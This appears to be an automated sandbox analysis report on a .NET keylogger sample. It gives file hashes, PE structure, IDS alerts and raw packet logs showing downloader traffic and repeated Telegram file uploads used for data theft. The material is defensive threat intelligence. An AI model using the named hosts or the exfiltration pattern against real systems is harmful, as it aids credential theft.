                                                                                                            JgE2YgxSzB.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 149.154.167.220
                                                                                                            87J30ulb4q.exeGet hashmaliciousUnknownBrowse
                                                                                                            • 149.154.167.220
                                                                                                            No context
                                                                                                            Process:C:\Users\user\Desktop\Yef4EqsQha.exe
                                                                                                            File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                                                            Category:dropped
                                                                                                            Size (bytes):71954
                                                                                                            Entropy (8bit):7.996617769952133
                                                                                                            Encrypted:true
                                                                                                            SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                                                                                            MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                                                                                            SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                                                                                            SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                                                                                            SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                                                                                            Malicious:false
                                                                                                            Reputation:high, very likely benign file
                                                                                                            Process:C:\Users\user\Desktop\Yef4EqsQha.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):328
                                                                                                            Entropy (8bit):3.230795304831838
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:6:kK/e9UswD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:3BDImsLNkPlE99SNxAhUe/3
                                                                                                            MD5:DD8180A968BF3FDD1C2E95741B4A83C9
                                                                                                            SHA1:AD54358E5B2E7947F11EEA450A277EE947ADAA5B
                                                                                                            SHA-256:558510748953A4675BF8BE5FE38E24FC9EF8F45CE49DA0A023F7C1BC87FD83A4
                                                                                                            SHA-512:5CE4A6783DB2FB4C57A0CF1C1E96752FEBEBA0BBE850AC676DE0067E1B6845878562CACE7D47FBC7A304AD01D2C25054FDFC12DF442B2EE0BD4D50EACC979CED
                                                                                                            Malicious:false
                                                                                                            Reputation:low
                                                                                                            Preview:p...... ..........?.l..(....................................................... ........G..@.......&......X........h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...
                                                                                                            Process:C:\Users\user\Desktop\Yef4EqsQha.exe
                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1415
                                                                                                            Entropy (8bit):5.352427679901606
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPE4KMRaKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPHKMRatHo6hAH4
                                                                                                            MD5:97AD91F1C1F572C945DA12233082171D
                                                                                                            SHA1:D5E33DDAB37E32E416FC40419FB26B3C0563519D
                                                                                                            SHA-256:3F64591E0447E6F5034BC69A8A8D4C7ED36DAC5FE1E408401AE1B98F0D915F7E
                                                                                                            SHA-512:8FAEED342DADC17571F711DDC1BE67C79A51CA5BD56B5DA13E472ED45FC4EC6F1DC704BA92E81E97F5ECFD73F3D88F9B9CD9AE4EADDF993BFF826627215FBBCE
                                                                                                            Malicious:true
                                                                                                            Reputation:moderate, very likely benign file
                                                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Data, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Data\1b8c564fd69668e6e62d136259980d9e\System.Data.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fc
                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):2232
                                                                                                            Entropy (8bit):5.380747059108785
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:48:lylWSU4y4RdymFoUeW+gZ9tK8NPZHUxL7u1iMuge//MPUyus:lGLHyIdvKLgZ2KRHWLOugss
                                                                                                            MD5:3200119B12511121F9F608784BE9A337
                                                                                                            SHA1:AA1FE8DAB7247C3F2D698790E786FFFFB54D71D4
                                                                                                            SHA-256:E996B4D99B21FD9CE93D7587637A91FE824452A920E339C9CCD100107F61C0D9
                                                                                                            SHA-512:9E14106945D945C9C63D0406D595DC41275B4ED16A7007888BCC8675A0DF3D829F7831E01449B9D6F41220234B56AEAF377E6EC72082C569551291F04C401B0A
                                                                                                            Malicious:false
                                                                                                            Preview:@...e.................................^..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...<...............i..VdqF...|...........System.Configuration@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):60
                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                            Malicious:false
                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                            Entropy (8bit):7.608958923765637
                                                                                                            TrID:
                                                                                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                                                            • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                            • Windows Screen Saver (13104/52) 0.07%
                                                                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                            File name:Yef4EqsQha.exe
File size: 865'792 bytes
MD5: 91ccccf28bcd650fc1f8e5256891211c
SHA1: 35ceec260d23f1aaa3b948060a0f4c5c926f9b73
SHA256: f2675f59a65add81d32683e6ec1a2aec2c37547df4ef331c21b5f498ccee7897
SHA512: 6d9ef4683482a59ef0a25eb402a54bf27adc0039c1c474ef41ea4e4424796d33285cd3e1f8521ac3331990e288bf514a2abf5c83ab7fb7c5b37f865205ba05a5
SSDEEP: 12288:jMMy+nuP3eBfkS7MYDiyUKmBnjVlNqPFqQPuWZcWRmF1cmSKeE9pMFGwy9EXX+:4+0OZkTPyUPB5EGWZc+mFwKWFGwFO
TLSH: 5F05E0643B6DCB06C5394BF00970E6B813797D8AB811E30B6ED9BEDF7876B154A10683
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...p.................0..,..........JK... ...`....@.. ....................................@................................
Icon Hash: 00928e8e8686b000
Entrypoint: 0x4d4b4a
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp: 0xA6F3EF70 [Sat Oct 5 00:46:40 2058 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                                            Instruction
                                                                                                            jmp dword ptr [00402000h]
                                                                                                            push ebx
                                                                                                            add byte ptr [ecx+00h], bh
                                                                                                            jnc 00007F7E5C8337C2h
                                                                                                            je 00007F7E5C8337C2h
                                                                                                            add byte ptr [ebp+00h], ch
                                                                                                            add byte ptr [ecx+00h], al
                                                                                                            arpl word ptr [eax], ax
                                                                                                            je 00007F7E5C8337C2h
                                                                                                            imul eax, dword ptr [eax], 00610076h
                                                                                                            je 00007F7E5C8337C2h
                                                                                                            outsd
                                                                                                            add byte ptr [edx+00h], dh
                                                                                                            add byte ptr [eax], al
| Name | Virtual Address | Virtual Size | Is in Section |
|---|---|---|---|
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0xd4af5 | 0x4f | .text |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xd6000 | 0x5cc | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xd8000 | 0xc | .reloc |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0xd24fc | 0x70 | .text |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |

| Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
|---|---|---|---|---|---|---|---|---|---|
| .text | 0x2000 | 0xd2b70 | 0xd2c00 | a9800489c210e624a225f9ed79542f07 | False | 0.8345856038701067 | data | 7.615593459072145 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
| .rsrc | 0xd6000 | 0x5cc | 0x600 | 6a722d37ddd92c77dee1d52a3fd7c37a | False | 0.4270833333333333 | data | 4.1256364909387795 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .reloc | 0xd8000 | 0xc | 0x200 | 9ebc8b00de2231a5d4f81f25aead7cfc | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ |

| Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
|---|---|---|---|---|---|---|
| RT_VERSION | 0xd6090 | 0x33c | data | | | 0.4311594202898551 |
| RT_MANIFEST | 0xd63dc | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347 |

| DLL | Import |
|---|---|
| mscoree.dll | _CorExeMain |

| Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2025-01-10T23:06:24.708171+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.7 | 49732 | 193.122.6.168 | 80 | TCP |
| 2025-01-10T23:06:25.833163+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.7 | 49732 | 193.122.6.168 | 80 | TCP |
| 2025-01-10T23:06:26.398364+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.7 | 49751 | 104.21.112.1 | 443 | TCP |
| 2025-01-10T23:06:27.098861+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.7 | 49757 | 193.122.6.168 | 80 | TCP |
| 2025-01-10T23:06:29.105641+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.7 | 49773 | 104.21.112.1 | 443 | TCP |
| 2025-01-10T23:06:34.333208+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.7 | 49815 | 104.21.112.1 | 443 | TCP |
| 2025-01-10T23:06:36.689951+0100 | 1810007 | Joe Security ANOMALY Telegram Send Message | 1 | 192.168.2.7 | 49834 | 149.154.167.220 | 443 | TCP |
| 2025-01-10T23:06:44.285053+0100 | 1810008 | Joe Security ANOMALY Telegram Send File | 1 | 192.168.2.7 | 49884 | 149.154.167.220 | 443 | TCP |
| 2025-01-10T23:07:06.926915+0100 | 1810008 | Joe Security ANOMALY Telegram Send File | 1 | 192.168.2.7 | 49995 | 149.154.167.220 | 443 | TCP |
| 2025-01-10T23:07:07.863530+0100 | 1810008 | Joe Security ANOMALY Telegram Send File | 1 | 192.168.2.7 | 49996 | 149.154.167.220 | 443 | TCP |
| 2025-01-10T23:07:08.804424+0100 | 1810008 | Joe Security ANOMALY Telegram Send File | 1 | 192.168.2.7 | 49997 | 149.154.167.220 | 443 | TCP |
| 2025-01-10T23:07:09.780103+0100 | 1810008 | Joe Security ANOMALY Telegram Send File | 1 | 192.168.2.7 | 49998 | 149.154.167.220 | 443 | TCP |
| 2025-01-10T23:07:10.733606+0100 | 1810008 | Joe Security ANOMALY Telegram Send File | 1 | 192.168.2.7 | 49999 | 149.154.167.220 | 443 | TCP |
| 2025-01-10T23:07:11.643892+0100 | 1810008 | Joe Security ANOMALY Telegram Send File | 1 | 192.168.2.7 | 50000 | 149.154.167.220 | 443 | TCP |
| 2025-01-10T23:07:15.656959+0100 | 1810008 | Joe Security ANOMALY Telegram Send File | 1 | 192.168.2.7 | 50001 | 149.154.167.220 | 443 | TCP |
| 2025-01-10T23:07:16.578900+0100 | 1810008 | Joe Security ANOMALY Telegram Send File | 1 | 192.168.2.7 | 50002 | 149.154.167.220 | 443 | TCP |
| 2025-01-10T23:07:17.488276+0100 | 1810008 | Joe Security ANOMALY Telegram Send File | 1 | 192.168.2.7 | 50004 | 149.154.167.220 | 443 | TCP |
| 2025-01-10T23:07:18.467441+0100 | 1810008 | Joe Security ANOMALY Telegram Send File | 1 | 192.168.2.7 | 50005 | 149.154.167.220 | 443 | TCP |
| 2025-01-10T23:07:19.405961+0100 | 1810008 | Joe Security ANOMALY Telegram Send File | 1 | 192.168.2.7 | 50006 | 149.154.167.220 | 443 | TCP |
| 2025-01-10T23:07:23.344119+0100 | 1810008 | Joe Security ANOMALY Telegram Send File | 1 | 192.168.2.7 | 50007 | 149.154.167.220 | 443 | TCP |
| 2025-01-10T23:07:24.333296+0100 | 1810008 | Joe Security ANOMALY Telegram Send File | 1 | 192.168.2.7 | 50008 | 149.154.167.220 | 443 | TCP |
| 2025-01-10T23:07:25.219888+0100 | 1810008 | Joe Security ANOMALY Telegram Send File | 1 | 192.168.2.7 | 50009 | 149.154.167.220 | 443 | TCP |
| 2025-01-10T23:07:26.177148+0100 | 1810008 | Joe Security ANOMALY Telegram Send File | 1 | 192.168.2.7 | 50010 | 149.154.167.220 | 443 | TCP |
| 2025-01-10T23:07:27.078510+0100 | 1810008 | Joe Security ANOMALY Telegram Send File | 1 | 192.168.2.7 | 50011 | 149.154.167.220 | 443 | TCP |
| 2025-01-10T23:07:31.059922+0100 | 1810008 | Joe Security ANOMALY Telegram Send File | 1 | 192.168.2.7 | 50012 | 149.154.167.220 | 443 | TCP |
| 2025-01-10T23:07:32.005003+0100 | 1810008 | Joe Security ANOMALY Telegram Send File | 1 | 192.168.2.7 | 50013 | 149.154.167.220 | 443 | TCP |
| 2025-01-10T23:07:33.053240+0100 | 1810008 | Joe Security ANOMALY Telegram Send File | 1 | 192.168.2.7 | 50014 | 149.154.167.220 | 443 | TCP |
| 2025-01-10T23:07:34.160472+0100 | 1810008 | Joe Security ANOMALY Telegram Send File | 1 | 192.168.2.7 | 50015 | 149.154.167.220 | 443 | TCP |
| 2025-01-10T23:07:35.171257+0100 | 1810008 | Joe Security ANOMALY Telegram Send File | 1 | 192.168.2.7 | 50016 | 149.154.167.220 | 443 | TCP |
| 2025-01-10T23:07:36.249133+0100 | 1810008 | Joe Security ANOMALY Telegram Send File | 1 | 192.168.2.7 | 50017 | 149.154.167.220 | 443 | TCP |
| 2025-01-10T23:07:45.402268+0100 | 1810008 | Joe Security ANOMALY Telegram Send File | 1 | 192.168.2.7 | 50018 | 149.154.167.220 | 443 | TCP |
| 2025-01-10T23:07:46.349426+0100 | 1810008 | Joe Security ANOMALY Telegram Send File | 1 | 192.168.2.7 | 50019 | 149.154.167.220 | 443 | TCP |
| 2025-01-10T23:07:47.301327+0100 | 1810008 | Joe Security ANOMALY Telegram Send File | 1 | 192.168.2.7 | 50020 | 149.154.167.220 | 443 | TCP |
| 2025-01-10T23:07:48.309609+0100 | 1810008 | Joe Security ANOMALY Telegram Send File | 1 | 192.168.2.7 | 50021 | 149.154.167.220 | 443 | TCP |
| 2025-01-10T23:07:49.232355+0100 | 1810008 | Joe Security ANOMALY Telegram Send File | 1 | 192.168.2.7 | 50022 | 149.154.167.220 | 443 | TCP |
| 2025-01-10T23:07:53.256177+0100 | 1810008 | Joe Security ANOMALY Telegram Send File | 1 | 192.168.2.7 | 50023 | 149.154.167.220 | 443 | TCP |
| 2025-01-10T23:07:54.273003+0100 | 1810008 | Joe Security ANOMALY Telegram Send File | 1 | 192.168.2.7 | 50024 | 149.154.167.220 | 443 | TCP |
| 2025-01-10T23:07:55.390529+0100 | 1810008 | Joe Security ANOMALY Telegram Send File | 1 | 192.168.2.7 | 50025 | 149.154.167.220 | 443 | TCP |
| 2025-01-10T23:07:56.302892+0100 | 1810008 | Joe Security ANOMALY Telegram Send File | 1 | 192.168.2.7 | 50026 | 149.154.167.220 | 443 | TCP |
| 2025-01-10T23:07:57.214769+0100 | 1810008 | Joe Security ANOMALY Telegram Send File | 1 | 192.168.2.7 | 50027 | 149.154.167.220 | 443 | TCP |
| 2025-01-10T23:08:01.186194+0100 | 1810008 | Joe Security ANOMALY Telegram Send File | 1 | 192.168.2.7 | 50028 | 149.154.167.220 | 443 | TCP |
| 2025-01-10T23:08:02.259667+0100 | 1810008 | Joe Security ANOMALY Telegram Send File | 1 | 192.168.2.7 | 50029 | 149.154.167.220 | 443 | TCP |
| 2025-01-10T23:08:03.211107+0100 | 1810008 | Joe Security ANOMALY Telegram Send File | 1 | 192.168.2.7 | 50030 | 149.154.167.220 | 443 | TCP |
| 2025-01-10T23:08:04.158685+0100 | 1810008 | Joe Security ANOMALY Telegram Send File | 1 | 192.168.2.7 | 50031 | 149.154.167.220 | 443 | TCP |
| 2025-01-10T23:08:05.117022+0100 | 1810008 | Joe Security ANOMALY Telegram Send File | 1 | 192.168.2.7 | 50032 | 149.154.167.220 | 443 | TCP |
| 2025-01-10T23:08:09.074400+0100 | 1810008 | Joe Security ANOMALY Telegram Send File | 1 | 192.168.2.7 | 50033 | 149.154.167.220 | 443 | TCP |
| 2025-01-10T23:08:10.116286+0100 | 1810008 | Joe Security ANOMALY Telegram Send File | 1 | 192.168.2.7 | 50034 | 149.154.167.220 | 443 | TCP |
| 2025-01-10T23:08:11.189173+0100 | 1810008 | Joe Security ANOMALY Telegram Send File | 1 | 192.168.2.7 | 50035 | 149.154.167.220 | 443 | TCP |

Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                            Jan 10, 2025 23:06:25.415704012 CET44349744104.21.112.1192.168.2.7
                                                                                                            Jan 10, 2025 23:06:25.415757895 CET49744443192.168.2.7104.21.112.1
                                                                                                            Jan 10, 2025 23:06:25.592042923 CET49744443192.168.2.7104.21.112.1
                                                                                                            Jan 10, 2025 23:06:25.595396996 CET4973280192.168.2.7193.122.6.168
                                                                                                            Jan 10, 2025 23:06:25.600276947 CET8049732193.122.6.168192.168.2.7
                                                                                                            Jan 10, 2025 23:06:25.783324957 CET8049732193.122.6.168192.168.2.7
                                                                                                            Jan 10, 2025 23:06:25.786412001 CET49751443192.168.2.7104.21.112.1
                                                                                                            Jan 10, 2025 23:06:25.786447048 CET44349751104.21.112.1192.168.2.7
                                                                                                            Jan 10, 2025 23:06:25.786604881 CET49751443192.168.2.7104.21.112.1
                                                                                                            Jan 10, 2025 23:06:25.786948919 CET49751443192.168.2.7104.21.112.1
                                                                                                            Jan 10, 2025 23:06:25.786961079 CET44349751104.21.112.1192.168.2.7
                                                                                                            Jan 10, 2025 23:06:25.833163023 CET4973280192.168.2.7193.122.6.168
                                                                                                            Jan 10, 2025 23:06:26.261480093 CET44349751104.21.112.1192.168.2.7
                                                                                                            Jan 10, 2025 23:06:26.263972998 CET49751443192.168.2.7104.21.112.1
                                                                                                            Jan 10, 2025 23:06:26.263991117 CET44349751104.21.112.1192.168.2.7
                                                                                                            Jan 10, 2025 23:06:26.398332119 CET44349751104.21.112.1192.168.2.7
                                                                                                            Jan 10, 2025 23:06:26.398408890 CET44349751104.21.112.1192.168.2.7
                                                                                                            Jan 10, 2025 23:06:26.398761034 CET49751443192.168.2.7104.21.112.1
                                                                                                            Jan 10, 2025 23:06:26.399075031 CET49751443192.168.2.7104.21.112.1
                                                                                                            Jan 10, 2025 23:06:26.402914047 CET4973280192.168.2.7193.122.6.168
                                                                                                            Jan 10, 2025 23:06:26.404196978 CET4975780192.168.2.7193.122.6.168
                                                                                                            Jan 10, 2025 23:06:26.407985926 CET8049732193.122.6.168192.168.2.7
                                                                                                            Jan 10, 2025 23:06:26.408045053 CET4973280192.168.2.7193.122.6.168
                                                                                                            Jan 10, 2025 23:06:26.408979893 CET8049757193.122.6.168192.168.2.7
                                                                                                            Jan 10, 2025 23:06:26.409053087 CET4975780192.168.2.7193.122.6.168
                                                                                                            Jan 10, 2025 23:06:26.409161091 CET4975780192.168.2.7193.122.6.168
                                                                                                            Jan 10, 2025 23:06:26.413870096 CET8049757193.122.6.168192.168.2.7
                                                                                                            Jan 10, 2025 23:06:27.053514004 CET8049757193.122.6.168192.168.2.7
                                                                                                            Jan 10, 2025 23:06:27.054974079 CET49764443192.168.2.7104.21.112.1
                                                                                                            Jan 10, 2025 23:06:27.055012941 CET44349764104.21.112.1192.168.2.7
                                                                                                            Jan 10, 2025 23:06:27.055084944 CET49764443192.168.2.7104.21.112.1
                                                                                                            Jan 10, 2025 23:06:27.055355072 CET49764443192.168.2.7104.21.112.1
                                                                                                            Jan 10, 2025 23:06:27.055371046 CET44349764104.21.112.1192.168.2.7
                                                                                                            Jan 10, 2025 23:06:27.098860979 CET4975780192.168.2.7193.122.6.168
                                                                                                            Jan 10, 2025 23:06:27.532980919 CET44349764104.21.112.1192.168.2.7
                                                                                                            Jan 10, 2025 23:06:27.534606934 CET49764443192.168.2.7104.21.112.1
                                                                                                            Jan 10, 2025 23:06:27.534643888 CET44349764104.21.112.1192.168.2.7
                                                                                                            Jan 10, 2025 23:06:27.662179947 CET44349764104.21.112.1192.168.2.7
                                                                                                            Jan 10, 2025 23:06:27.662240028 CET44349764104.21.112.1192.168.2.7
                                                                                                            Jan 10, 2025 23:06:27.662481070 CET49764443192.168.2.7104.21.112.1
                                                                                                            Jan 10, 2025 23:06:27.662956953 CET49764443192.168.2.7104.21.112.1
                                                                                                            Jan 10, 2025 23:06:27.667114019 CET4977080192.168.2.7193.122.6.168
                                                                                                            Jan 10, 2025 23:06:27.671890020 CET8049770193.122.6.168192.168.2.7
                                                                                                            Jan 10, 2025 23:06:27.671962023 CET4977080192.168.2.7193.122.6.168
                                                                                                            Jan 10, 2025 23:06:27.672051907 CET4977080192.168.2.7193.122.6.168
                                                                                                            Jan 10, 2025 23:06:27.677297115 CET8049770193.122.6.168192.168.2.7
                                                                                                            Jan 10, 2025 23:06:28.323019028 CET8049770193.122.6.168192.168.2.7
                                                                                                            Jan 10, 2025 23:06:28.324186087 CET49773443192.168.2.7104.21.112.1
                                                                                                            Jan 10, 2025 23:06:28.324225903 CET44349773104.21.112.1192.168.2.7
                                                                                                            Jan 10, 2025 23:06:28.324297905 CET49773443192.168.2.7104.21.112.1
                                                                                                            Jan 10, 2025 23:06:28.324549913 CET49773443192.168.2.7104.21.112.1
                                                                                                            Jan 10, 2025 23:06:28.324562073 CET44349773104.21.112.1192.168.2.7
                                                                                                            Jan 10, 2025 23:06:28.364428997 CET4977080192.168.2.7193.122.6.168
                                                                                                            Jan 10, 2025 23:06:28.801151991 CET44349773104.21.112.1192.168.2.7
                                                                                                            Jan 10, 2025 23:06:28.810631037 CET49773443192.168.2.7104.21.112.1
                                                                                                            Jan 10, 2025 23:06:28.810661077 CET44349773104.21.112.1192.168.2.7
                                                                                                            Jan 10, 2025 23:06:29.105664968 CET44349773104.21.112.1192.168.2.7
                                                                                                            Jan 10, 2025 23:06:29.105732918 CET44349773104.21.112.1192.168.2.7
                                                                                                            Jan 10, 2025 23:06:29.105818033 CET49773443192.168.2.7104.21.112.1
                                                                                                            Jan 10, 2025 23:06:29.164027929 CET49773443192.168.2.7104.21.112.1
                                                                                                            Jan 10, 2025 23:06:29.205835104 CET4977080192.168.2.7193.122.6.168
                                                                                                            Jan 10, 2025 23:06:29.210916042 CET8049770193.122.6.168192.168.2.7
                                                                                                            Jan 10, 2025 23:06:29.210973978 CET4977080192.168.2.7193.122.6.168
                                                                                                            Jan 10, 2025 23:06:29.238604069 CET4977980192.168.2.7193.122.6.168
                                                                                                            Jan 10, 2025 23:06:29.243618965 CET8049779193.122.6.168192.168.2.7
                                                                                                            Jan 10, 2025 23:06:29.243684053 CET4977980192.168.2.7193.122.6.168
                                                                                                            Jan 10, 2025 23:06:29.243932009 CET4977980192.168.2.7193.122.6.168
                                                                                                            Jan 10, 2025 23:06:29.248704910 CET8049779193.122.6.168192.168.2.7
                                                                                                            Jan 10, 2025 23:06:29.871208906 CET8049779193.122.6.168192.168.2.7
                                                                                                            Jan 10, 2025 23:06:29.872647047 CET49784443192.168.2.7104.21.112.1
                                                                                                            Jan 10, 2025 23:06:29.872684956 CET44349784104.21.112.1192.168.2.7
                                                                                                            Jan 10, 2025 23:06:29.872741938 CET49784443192.168.2.7104.21.112.1
                                                                                                            Jan 10, 2025 23:06:29.873191118 CET49784443192.168.2.7104.21.112.1
                                                                                                            Jan 10, 2025 23:06:29.873200893 CET44349784104.21.112.1192.168.2.7
                                                                                                            Jan 10, 2025 23:06:29.911324978 CET4977980192.168.2.7193.122.6.168
                                                                                                            Jan 10, 2025 23:06:30.327202082 CET44349784104.21.112.1192.168.2.7
                                                                                                            Jan 10, 2025 23:06:30.329027891 CET49784443192.168.2.7104.21.112.1
                                                                                                            Jan 10, 2025 23:06:30.329044104 CET44349784104.21.112.1192.168.2.7
                                                                                                            Jan 10, 2025 23:06:30.460563898 CET44349784104.21.112.1192.168.2.7
                                                                                                            Jan 10, 2025 23:06:30.460658073 CET44349784104.21.112.1192.168.2.7
                                                                                                            Jan 10, 2025 23:06:30.460700989 CET49784443192.168.2.7104.21.112.1
                                                                                                            Jan 10, 2025 23:06:30.461622953 CET49784443192.168.2.7104.21.112.1
                                                                                                            Jan 10, 2025 23:06:30.466119051 CET4977980192.168.2.7193.122.6.168
                                                                                                            Jan 10, 2025 23:06:30.467905045 CET4979080192.168.2.7193.122.6.168
                                                                                                            Jan 10, 2025 23:06:30.471107960 CET8049779193.122.6.168192.168.2.7
                                                                                                            Jan 10, 2025 23:06:30.471494913 CET4977980192.168.2.7193.122.6.168
                                                                                                            Jan 10, 2025 23:06:30.472759008 CET8049790193.122.6.168192.168.2.7
                                                                                                            Jan 10, 2025 23:06:30.472826004 CET4979080192.168.2.7193.122.6.168
                                                                                                            Jan 10, 2025 23:06:30.472919941 CET4979080192.168.2.7193.122.6.168
